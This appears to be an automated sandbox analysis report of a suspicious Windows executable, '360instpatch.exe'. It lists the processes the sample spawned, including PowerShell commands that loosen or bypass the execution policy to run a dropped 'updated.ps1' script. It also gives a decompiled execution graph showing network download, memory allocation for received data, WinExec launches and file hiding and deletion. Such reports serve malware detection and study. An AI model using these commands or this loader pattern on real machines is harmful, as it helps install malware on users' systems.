                                                                                                                                                                                                            Start time:03:02:04
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                                                            Imagebase:0x810000
                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                                                            Imagebase:0x810000
                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:03:02:08
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Imagebase:0xb10000
                                                                                                                                                                                                            File size:4'118'496 bytes
                                                                                                                                                                                                            MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 17%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:03:02:08
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Imagebase:0xb10000
                                                                                                                                                                                                            File size:4'118'496 bytes
                                                                                                                                                                                                            MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:03:02:11
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:7.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                              Signature Coverage:4.7%
                                                                                                                                                                                                              Total number of Nodes:1622
                                                                                                                                                                                                              Total number of Limit Nodes:5
                                                                                                                                                                                                              execution_graph 10604 10001000 10605 1000100d _Error_objects 10604->10605 10606 10010b09 _Error_objects 2 API calls 10605->10606 10607 10001017 10606->10607 10766 10001080 malloc 10951 10003d80 10954 100012c0 __std_exception_copy 10951->10954 10953 10003d93 10954->10953 11314 1000b680 11315 1000b6a0 11314->11315 11316 1000b690 _unlock_file 11314->11316 11316->11315 11605 d51b57 11608 d51b87 11605->11608 11624 d61737 11608->11624 11611 d51bd5 HttpQueryInfoW 11612 d51c11 SendMessageW 11611->11612 11613 d51c28 InternetReadFile 11611->11613 11612->11613 11614 d51cfe InternetCloseHandle InternetCloseHandle GetParent ShowWindow 11613->11614 11616 d51c4a 11613->11616 11617 d51727 6 API calls 11614->11617 11616->11613 11616->11614 11620 d51ce8 SendMessageW 11616->11620 11618 d51d42 11617->11618 11619 d51727 6 API calls 11618->11619 11621 d51d52 11619->11621 11620->11616 11626 d5f307 11621->11626 11625 d51b94 InternetOpenA InternetOpenUrlA 11624->11625 11625->11611 11627 d5f329 11626->11627 11645 d5ee57 RpcStringBindingComposeW 11627->11645 11633 d5f388 _swprintf 11660 d5ff17 NdrClientCall2 11633->11660 11635 d5f405 Sleep 11636 d5f057 5 API calls 11635->11636 11637 d5f3e1 11636->11637 11637->11635 11638 d5f42e 11637->11638 11644 d51b7a 11637->11644 11661 d5f1e7 11638->11661 11640 d5f456 Sleep 11641 d5f43b 11640->11641 11641->11640 11642 d5f49b 11641->11642 11641->11644 11643 d5f217 NdrClientCall2 11642->11643 11643->11644 11646 d5eea4 11645->11646 11647 d5eea8 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 11645->11647 11648 d5f057 11646->11648 11647->11646 11653 d5f080 11648->11653 11649 d5f0ba 11649->11633 11657 d5f217 11649->11657 11651 d5f1a5 CoTaskMemFree 11651->11653 11652 d5f1b8 CoTaskMemFree 11652->11649 11652->11653 11653->11649 11653->11651 11653->11652 11654 d5f148 11653->11654 11664 d5ff47 NdrClientCall2 11653->11664 11655 d5f175 CoTaskMemFree 11654->11655 11656 d5f162 CoTaskMemFree 11654->11656 11655->11649 11656->11654 11665 d5ffc7 NdrClientCall2 11657->11665 11659 d5f229 11659->11633 11660->11637 11666 d5ff87 NdrClientCall2 11661->11666 11663 d5f208 11663->11641 11664->11653 11665->11659 11666->11663 10955 1000998b 10956 1000998e _Smanip _Error_objects 10955->10956 10957 1000b990 10 API calls 10956->10957 10958 10009ac0 10957->10958 10959 10004540 10 API calls 10958->10959 10960 10009ad7 10959->10960 10961 1000b970 2 API calls 10960->10961 10962 10009ae9 10961->10962 10963 10002210 8 API calls 10962->10963 10964 10009b0f 10963->10964 10965 10004390 14 API calls 10964->10965 10966 10009b1b _Smanip _Error_objects 10965->10966 10967 1000b990 10 API calls 10966->10967 10968 10009bd1 10967->10968 10969 10004540 10 API calls 10968->10969 10970 10009be8 10969->10970 10971 1000d190 12 API calls 10970->10971 10972 10009c1b 10971->10972 10973 100020a0 2 API calls 10972->10973 10974 10009c2d 10973->10974 10975 1000b970 2 API calls 10974->10975 10976 10009c3c 10975->10976 10977 10004680 DeleteFileA 10976->10977 10978 10009c4e 10977->10978 10979 10002190 8 API calls 10978->10979 10980 10009c68 10979->10980 10981 10004440 31 API calls 10980->10981 10982 10009c7f 10981->10982 10983 100020a0 2 API calls 10982->10983 10984 10009c91 Sleep 10983->10984 10985 10009ca9 10984->10985 10986 10002190 8 API calls 10985->10986 10987 10009cb5 _Smanip _Error_objects 10986->10987 10988 1000b990 10 API calls 10987->10988 10989 10009d2a 10988->10989 10990 10004540 10 API calls 10989->10990 10991 10009d41 10990->10991 10992 10002210 8 API calls 10991->10992 10993 10009d8b 10992->10993 10994 10004390 14 API calls 10993->10994 10995 10009d97 10994->10995 10996 100020a0 2 API calls 10995->10996 10997 10009daf 10996->10997 10998 1000b970 2 API calls 10997->10998 10999 10009dbe 10998->10999 11000 100020a0 2 API calls 10999->11000 11001 10009dcd 11000->11001 11002 10002190 8 API calls 11001->11002 11003 10009de5 _Smanip _Error_objects 11002->11003 11004 1000b990 10 API calls 11003->11004 11005 10009e5e 11004->11005 11006 10004540 10 API calls 11005->11006 11007 10009e75 11006->11007 11008 10002210 8 API calls 11007->11008 11009 10009ebf 11008->11009 11010 10004390 14 API calls 11009->11010 11011 10009ecb 11010->11011 11012 100020c0 2 API calls 11011->11012 11013 10009ef2 11012->11013 11014 100020a0 2 API calls 11013->11014 11015 10009efd 11014->11015 11016 100020a0 2 API calls 11015->11016 11017 10009f0c 11016->11017 11018 1000b970 2 API calls 11017->11018 11019 10009f1b 11018->11019 11020 100020a0 2 API calls 11019->11020 11021 10009f2a 11020->11021 11022 1000d260 8 API calls 11021->11022 11023 10009f43 11022->11023 11024 1000d2f0 10 API calls 11023->11024 11025 10009f71 11024->11025 11026 1000d2f0 10 API calls 11025->11026 11027 10009f9f 11026->11027 11028 1000d2f0 10 API calls 11027->11028 11029 10009fcd 11028->11029 11030 1000d2f0 10 API calls 11029->11030 11031 10009ffb 11030->11031 11032 1000d2f0 10 API calls 11031->11032 11033 1000a029 11032->11033 11034 1000d2f0 10 API calls 11033->11034 11035 1000a057 11034->11035 11036 1000d2f0 10 API calls 11035->11036 11037 1000a085 11036->11037 11038 1000d2f0 10 API calls 11037->11038 11039 1000a0b3 11038->11039 11040 1000d2f0 10 API calls 11039->11040 11041 1000a0e1 11040->11041 11042 1000d2f0 10 API calls 11041->11042 11043 1000a10f 11042->11043 11044 1000d2f0 10 API calls 11043->11044 11045 1000a13d 11044->11045 11046 100020a0 2 API calls 11045->11046 11047 1000a14f 11046->11047 11048 100020a0 2 API calls 11047->11048 11049 1000a15e 11048->11049 11050 100020a0 2 API calls 11049->11050 11051 1000a16d 11050->11051 11052 100020a0 2 API calls 11051->11052 11053 1000a17c 11052->11053 11054 100020a0 2 API calls 11053->11054 11055 1000a18b 11054->11055 11056 100020a0 2 API calls 11055->11056 11057 1000a19a 11056->11057 11058 100020a0 2 API calls 11057->11058 11059 1000a1a9 11058->11059 11060 100020a0 2 API calls 11059->11060 11061 1000a1b8 11060->11061 11062 100020a0 2 API calls 11061->11062 11063 1000a1c7 11062->11063 11064 100020a0 2 API calls 11063->11064 11065 1000a1d6 11064->11065 11066 100020a0 2 API calls 11065->11066 11067 1000a1e5 11066->11067 11068 10004680 DeleteFileA 11067->11068 11069 1000a1f7 11068->11069 11070 10002190 8 API calls 11069->11070 11071 1000a211 11070->11071 11072 10004440 31 API calls 11071->11072 11073 1000a228 11072->11073 11074 100020a0 2 API calls 11073->11074 11075 1000a23a Sleep 11074->11075 11076 1000a252 _Smanip _Error_objects 11075->11076 11077 1000b990 10 API calls 11076->11077 11078 1000a4a1 11077->11078 11079 10004540 10 API calls 11078->11079 11080 1000a4b8 _Smanip _Error_objects 11079->11080 11081 1000b990 10 API calls 11080->11081 11082 1000a55e 11081->11082 11083 10004540 10 API calls 11082->11083 11084 1000a575 11083->11084 11085 1000d150 9 API calls 11084->11085 11086 1000a5b4 11085->11086 11087 100020a0 2 API calls 11086->11087 11088 1000a5c6 11087->11088 11089 1000b970 2 API calls 11088->11089 11090 1000a5d5 11089->11090 11091 100020a0 2 API calls 11090->11091 11092 1000a5e4 11091->11092 11093 1000b970 2 API calls 11092->11093 11094 1000a5f3 11093->11094 11095 1000a601 WinExec 11094->11095 11096 1000a614 _Smanip _Error_objects 11095->11096 11097 1000b990 10 API calls 11096->11097 11098 1000a74d 11097->11098 11099 10004540 10 API calls 11098->11099 11100 1000a764 11099->11100 11101 1000b970 2 API calls 11100->11101 11102 1000a776 _Smanip _Error_objects 11101->11102 11103 1000b990 10 API calls 11102->11103 11104 1000a809 11103->11104 11105 10004540 10 API calls 11104->11105 11106 1000a820 11105->11106 11107 10002f30 11 API calls 11106->11107 11108 1000a853 11107->11108 11109 10002f00 11 API calls 11108->11109 11110 1000a892 11109->11110 11111 100020c0 2 API calls 11110->11111 11112 1000a8ad 11111->11112 11113 100020a0 2 API calls 11112->11113 11114 1000a8b8 11113->11114 11115 100020a0 2 API calls 11114->11115 11116 1000a8c7 11115->11116 11117 100020a0 2 API calls 11116->11117 11118 1000a8d6 11117->11118 11119 1000b970 2 API calls 11118->11119 11120 1000a8e5 11119->11120 11121 1000a8f3 WinExec Sleep 11120->11121 11122 1000a911 11121->11122 11123 10002190 8 API calls 11122->11123 11124 1000a91d 11123->11124 11125 100048a0 SetFileAttributesA 11124->11125 11126 1000a92d 11125->11126 11127 100020a0 2 API calls 11126->11127 11128 1000a93f 11127->11128 11129 10002190 8 API calls 11128->11129 11130 1000a957 11129->11130 11131 100048a0 SetFileAttributesA 11130->11131 11132 1000a967 11131->11132 11133 100020a0 2 API calls 11132->11133 11134 1000a979 11133->11134 11135 10004680 DeleteFileA 11134->11135 11136 1000a98b 11135->11136 11137 10004680 DeleteFileA 11136->11137 11138 1000a99f 11137->11138 11139 100020a0 2 API calls 11138->11139 11140 1000a9bb 11139->11140 11141 100020a0 2 API calls 11140->11141 11142 1000a9ca 11141->11142 11143 100020a0 2 API calls 11142->11143 11144 1000a9d9 11143->11144 11145 100020a0 2 API calls 11144->11145 11146 1000a9e8 11145->11146 11147 100020a0 2 API calls 11146->11147 11148 1000a9f7 11147->11148 11149 100020a0 2 API calls 11148->11149 11150 1000aa06 11149->11150 11151 100020a0 2 API calls 11150->11151 11152 1000aa15 11151->11152 11153 100020a0 2 API calls 11152->11153 11154 1000aa24 11153->11154 11155 100020a0 2 API calls 11154->11155 11156 1000aa33 11155->11156 11157 100020a0 2 API calls 11156->11157 11158 1000aa42 11157->11158 11159 100020a0 2 API calls 11158->11159 11160 1000aa51 11159->11160 11161 100020a0 2 API calls 11160->11161 11162 1000aa60 11161->11162 11163 1000b970 2 API calls 11162->11163 11164 1000aa6f 11163->11164 11165 1000b970 2 API calls 11164->11165 11166 1000aa7e 11165->11166 11167 100020a0 2 API calls 11166->11167 11168 1000aa8d 11167->11168 11169 100020a0 2 API calls 11168->11169 11170 1000aa9f 11169->11170 10608 1000ac10 10609 1000ac21 fpos 10608->10609 10610 1000c1b0 2 API calls 10609->10610 10615 1000ac57 10609->10615 10611 1000ac38 10610->10611 10612 1000ac3f fsetpos 10611->10612 10611->10615 10613 1000ac68 fpos 10612->10613 10612->10615 10614 1000c120 2 API calls 10613->10614 10614->10615 10842 1000d110 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 11171 1000ad90 11172 1000ada2 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J 11171->11172 11173 1000adbc ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11171->11173 11174 1000ae97 11172->11174 11175 1000ae54 11173->11175 11177 1000addd 11173->11177 11175->11174 11176 1000ae6b fwrite 11175->11176 11176->11174 11177->11175 11178 1000ae11 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11177->11178 11181 10002ac0 memmove 11178->11181 11180 1000ae28 ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 11180->11175 11181->11180 11667 1000ab90 11668 1000ab9f 11667->11668 11669 1000abe6 11668->11669 11670 1000abc6 setvbuf 11668->11670 11670->11669 11671 1000abea 11670->11671 11672 1000c2d0 3 API calls 11671->11672 11672->11669 10767 1000d091 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 10843 d601c7 10844 d60131 10843->10844 10858 d6017b 10843->10858 10845 d60144 socket 10844->10845 10846 d601cc FreeAddrInfoW 10844->10846 10847 d60186 connect 10845->10847 10848 d6016d WSACleanup 10845->10848 10849 d601e0 WSACleanup 10846->10849 10854 d601f9 10846->10854 10850 d601c5 10847->10850 10851 d601aa closesocket 10847->10851 10848->10858 10849->10858 10850->10846 10851->10844 10852 d60200 recv 10853 d60278 10852->10853 10852->10854 10855 d60282 closesocket WSACleanup 10853->10855 10856 d6027e 10853->10856 10854->10852 10857 d602bf VirtualAlloc 10854->10857 10855->10858 10856->10857 10857->10858 11264 d5f2c4 CloseHandle 11265 d5f2f8 11264->11265 11320 10010697 11321 10010699 11320->11321 11322 100106b1 11321->11322 11324 100106b2 11321->11324 11325 100106bd 11324->11325 11326 100106d2 11325->11326 11327 100106c9 free 11325->11327 11326->11321 11327->11326 11182 1000999a 11183 100020a0 2 API calls 11182->11183 11184 100099af 11183->11184 11185 100020a0 2 API calls 11184->11185 11186 100099be 11185->11186 11187 100020a0 2 API calls 11186->11187 11188 100099cd 11187->11188 11189 100020a0 2 API calls 11188->11189 11190 100099dc 11189->11190 11191 1000b970 2 API calls 11190->11191 11192 100099eb 11191->11192 11193 1000b970 2 API calls 11192->11193 11194 100099fa 11193->11194 11195 100020a0 2 API calls 11194->11195 11196 10009a09 11195->11196 11197 100020a0 2 API calls 11196->11197 11198 10009a1b 11197->11198 11266 1000461a 11267 10002190 8 API calls 11266->11267 11268 1000462a 11267->11268 11328 10010e9b 11329 10010ea4 11328->11329 11330 10010ea9 11328->11330 11334 10011436 11329->11334 11338 10010d65 11330->11338 11335 1001144c 11334->11335 11337 10011455 11335->11337 11353 100113e9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11335->11353 11337->11330 11339 10010d71 ___scrt_is_nonwritable_in_current_image 11338->11339 11340 10010d9a dllmain_raw 11339->11340 11341 10010d80 11339->11341 11342 10010d95 11339->11342 11340->11341 11343 10010db4 dllmain_crt_dispatch 11340->11343 11354 10011481 11342->11354 11343->11341 11343->11342 11346 10010e06 11346->11341 11347 10010e0f dllmain_crt_dispatch 11346->11347 11347->11341 11348 10010e22 dllmain_raw 11347->11348 11348->11341 11349 10011481 _DllMain@12 DisableThreadLibraryCalls 11350 10010ded 11349->11350 11358 10010cb7 11350->11358 11352 10010dfb dllmain_raw 11352->11346 11353->11337 11355 1001148a 11354->11355 11356 10010dd5 11354->11356 11355->11356 11357 10011493 DisableThreadLibraryCalls 11355->11357 11356->11346 11356->11349 11357->11356 11359 10010cc3 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11358->11359 11360 10010cf4 11359->11360 11361 10010d5d 11359->11361 11370 10010ccc ___scrt_uninitialize_crt __RTC_Initialize __DllMainCRTStartup@12 11359->11370 11381 10010912 11360->11381 11388 1001124d IsProcessorFeaturePresent 11361->11388 11364 10010cf9 11387 100114af __std_type_info_destroy_list 11364->11387 11366 10010d64 ___scrt_is_nonwritable_in_current_image 11367 10010d9a dllmain_raw 11366->11367 11368 10010d95 11366->11368 11377 10010d80 11366->11377 11369 10010db4 dllmain_crt_dispatch 11367->11369 11367->11377 11371 10011481 _DllMain@12 DisableThreadLibraryCalls 11368->11371 11369->11368 11369->11377 11370->11352 11372 10010dd5 11371->11372 11373 10010e06 11372->11373 11376 10011481 _DllMain@12 DisableThreadLibraryCalls 11372->11376 11374 10010e0f dllmain_crt_dispatch 11373->11374 11373->11377 11375 10010e22 dllmain_raw 11374->11375 11374->11377 11375->11377 11378 10010ded 11376->11378 11377->11352 11379 10010cb7 __DllMainCRTStartup@12 10 API calls 11378->11379 11380 10010dfb dllmain_raw 11379->11380 11380->11373 11382 10010917 ___scrt_release_startup_lock 11381->11382 11383 1001091b _execute_onexit_table 11382->11383 11384 10010927 __DllMainCRTStartup@12 11382->11384 11383->11364 11385 10010934 11384->11385 11386 100116c7 _cexit 11384->11386 11385->11364 11387->11370 11389 10011263 __DllMainCRTStartup@12 11388->11389 11390 1001126f memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11389->11390 11391 10011352 __DllMainCRTStartup@12 11390->11391 11391->11366 10768 1000109e 10769 10010b09 _Error_objects 2 API calls 10768->10769 10770 100010a3 10769->10770 11199 d61549 IsProcessorFeaturePresent 11200 d6155e 11199->11200 11203 d61521 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11200->11203 11202 d61641 11203->11202 10620 1000b020 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10621 1000b080 10620->10621 10622 1000b04c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10620->10622 10624 1000b078 Concurrency::task_continuation_context::task_continuation_context 10621->10624 10625 1000c120 2 API calls 10621->10625 10622->10621 10623 1000b064 ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10622->10623 10623->10624 10626 1000b09b 10625->10626 10627 1000b0a5 10626->10627 10630 1000b0e1 _Error_objects 10626->10630 10645 10003e80 fgetc 10627->10645 10629 1000b0f0 fgetc 10629->10630 10631 1000b109 Concurrency::task_continuation_context::task_continuation_context 10629->10631 10630->10629 10632 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10630->10632 10634 1000b15e ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 10630->10634 10635 1000b198 10630->10635 10638 1000b1af 10630->10638 10647 1000c960 10630->10647 10633 100020a0 2 API calls 10631->10633 10632->10630 10633->10624 10634->10630 10636 1000b233 10635->10636 10639 1000b1a2 Concurrency::task_continuation_context::task_continuation_context 10635->10639 10640 100020a0 2 API calls 10636->10640 10642 1000b1f4 10638->10642 10643 1000b1cf ungetc 10638->10643 10641 100020a0 2 API calls 10639->10641 10640->10624 10641->10624 10644 100020a0 2 API calls 10642->10644 10643->10638 10644->10624 10646 10003e9a 10645->10646 10646->10624 10648 10002cf0 ?_Xout_of_range@std@@YAXPBD 10647->10648 10649 1000c97b 10648->10649 10652 1000cc00 10649->10652 10653 1000cc1f Concurrency::task_continuation_context::task_continuation_context 10652->10653 10656 10002d50 memmove 10653->10656 10655 1000c98b 10655->10630 10656->10655 10771 1000b4a0 10772 1000b4b3 Concurrency::task_continuation_context::task_continuation_context 10771->10772 10773 1000b4c3 Concurrency::task_continuation_context::task_continuation_context 10772->10773 10774 1000b4d4 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10772->10774 10775 1000b4e1 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10774->10775 10776 1000b51e 10774->10776 10775->10776 10777 1000b4f9 10775->10777 10776->10773 10778 1000c120 2 API calls 10776->10778 10779 1000b502 ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10777->10779 10780 1000b539 10778->10780 10779->10773 10781 1000b543 10780->10781 10782 1000b58b 10780->10782 10790 10003eb0 fputc 10781->10790 10783 1000b59b ?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 10782->10783 10785 1000b5e9 10783->10785 10786 1000b5db 10783->10786 10785->10773 10787 1000b5f6 fwrite 10785->10787 10786->10785 10788 1000b5e1 10786->10788 10787->10773 10788->10773 10789 10003eb0 fputc 10788->10789 10789->10773 10791 10003ecb 10790->10791 10791->10773 11269 10004220 11270 100042cb _Error_objects 11269->11270 11271 1000cd10 10 API calls 11270->11271 11272 1000431d 11271->11272 11273 10004020 5 API calls 11272->11273 11274 1000432f 11273->11274 11275 10002190 8 API calls 11274->11275 11276 10004341 11275->11276 11277 100020a0 2 API calls 11276->11277 11278 1000436b 11277->11278 11279 1000b970 2 API calls 11278->11279 11280 1000437a 11279->11280 11392 1000b2a0 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11393 1000b2b7 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11392->11393 11395 1000b2e3 Concurrency::task_continuation_context::task_continuation_context 11392->11395 11394 1000b2cf ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11393->11394 11393->11395 11394->11395 11506 1000ab20 11507 1000ab32 Concurrency::task_continuation_context::task_continuation_context 11506->11507 11509 1000ab85 11506->11509 11508 1000ab71 fflush 11507->11508 11507->11509 11508->11509 11510 d53ff7 MultiByteToWideChar 11511 d54032 11510->11511 11512 d54050 MultiByteToWideChar WideCharToMultiByte 11511->11512 11513 d54095 11512->11513 11514 d540b3 WideCharToMultiByte 11513->11514 11515 d540d9 11514->11515 11399 d60e72 11400 d60e80 11399->11400 11401 d60e7b 11399->11401 11409 d60d3c 11400->11409 11405 d6140d 11401->11405 11406 d61423 11405->11406 11408 d6142c 11406->11408 11425 d613c0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11406->11425 11408->11400 11411 d60d48 ___scrt_is_nonwritable_in_current_image 11409->11411 11410 d60d57 11411->11410 11412 d60d71 dllmain_raw 11411->11412 11413 d60d6c 11411->11413 11412->11410 11414 d60d8b 11412->11414 11413->11410 11430 d61458 11413->11430 11426 d60b34 11414->11426 11418 d60ddd 11418->11410 11420 d60b34 __DllMainCRTStartup@12 2 API calls 11418->11420 11419 d61458 _DllMain@12 DisableThreadLibraryCalls 11421 d60dc4 11419->11421 11422 d60df0 11420->11422 11424 d60dd2 dllmain_raw 11421->11424 11422->11410 11423 d60df9 dllmain_raw 11422->11423 11423->11410 11424->11418 11425->11408 11427 d60b3f 11426->11427 11429 d60b44 __DllMainCRTStartup@12 11426->11429 11427->11429 11434 d60b87 11427->11434 11429->11413 11431 d60dac 11430->11431 11432 d61461 11430->11432 11431->11418 11431->11419 11432->11431 11433 d6146a DisableThreadLibraryCalls 11432->11433 11433->11431 11435 d60b93 ___scrt_is_nonwritable_in_current_image 11434->11435 11442 d60919 11435->11442 11437 d60b9a __RTC_Initialize __DllMainCRTStartup@12 11439 d60bfd ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11437->11439 11446 d6147a 